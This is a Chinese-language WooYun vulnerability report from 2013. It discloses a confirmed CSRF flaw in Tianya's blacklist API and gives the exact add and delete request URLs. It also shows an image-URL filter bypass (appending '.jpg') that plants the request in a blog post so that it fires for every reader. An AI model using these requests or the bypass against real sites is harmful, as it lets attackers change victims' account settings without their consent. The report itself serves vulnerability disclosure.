当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035239

漏洞标题:天涯CSRF系列一:随意劫持用户黑名单操作权限

相关厂商:天涯社区

漏洞作者: LaiX

提交时间:2013-08-25 15:51

修复时间:2013-10-09 15:52

公开时间:2013-10-09 15:52

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-25: 细节已通知厂商并且等待厂商处理中
2013-08-26: 厂商已经确认,细节仅向厂商公开
2013-09-05: 细节向核心白帽子及相关领域专家公开
2013-09-15: 细节向普通白帽子公开
2013-09-25: 细节向实习白帽子公开
2013-10-09: 细节向公众公开

简要描述:

首先给天涯安全工作者普及一下知识。
一.CSRF是什么?
  CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。
二.CSRF可以做什么?
  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。
三.CSRF漏洞现状
  CSRF这种攻击方式在2000年已经被国外的安全人员提出,但在国内,直到06年才开始被关注,08年,国内外的多个大型社区和交互网站分别爆出CSRF漏洞,如:NYTimes.com(纽约时报)、Metafilter(一个大型的BLOG网站),YouTube和百度HI......而现在,互联网上的许多站点仍对此毫无防备,以至于安全业界称CSRF为“沉睡的巨人”。

详细说明:

Cross-siterequestforgery 漏洞,劫持用户黑名单操作,任意操作增删黑名单。漏洞证明将实现如何利用这个漏洞。

漏洞证明:

经过抓包,我发现一条有趣的GET请求

http://www.tianya.cn/api/tw?method=userBlack.ice.add&params.blackUserName=csrf&_r=


其中params.blackUserName参数,表示用户名,这个请求的作用是添加params.blackUserName中的用户名进入黑名单。
下面我给一种利用的方法:
1.在博客里发布文章
首先我们要利用img标签的src属性来达到GET请求的目的(关键)
所以我们在文章编辑里点击插入图片(这里吐槽一下,天涯的博客程序居然是ASP的)
我们先直接插入

http://www.tianya.cn/api/tw?method=userBlack.ice.add&params.blackUserName=csrf&_r=


这里还要演示一下如何绕过天涯图片检查
发现提示如下:

1.png


我们进一步构造

http://www.tianya.cn/api/tw?method=userBlack.ice.add&params.blackUserName=csrf&_r=&csrf=1.jpg


发现插入成功:

2.png


接着发布文章,然后打开文章。

3.png


然后我们打开我们的黑名单看看多了什么

4.png


我在本地构造了一个HTML页面,同样测试成功。
删除黑名单也是同样的原理,使用如下URL。

http://www.tianya.cn/api/tw?method=userBlack.ice.delete&params.blackUserIds=74877842


这里的params.blackUserIds 要使用用户的ID。
csrf 的 ID 为 74877842
我们看看效果:

5.png


已经没有了。
最重要的是,你发布的文章会在首页展示

6.png


修复方案:

CSRF的防御你们可以查一下相关资料。比如加入token

版权声明:转载请注明来源 LaiX@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-08-26 11:44

厂商回复:

辛苦你码字了,因为详细故给高分,没下次啦。 感谢提供!

最新状态:

暂无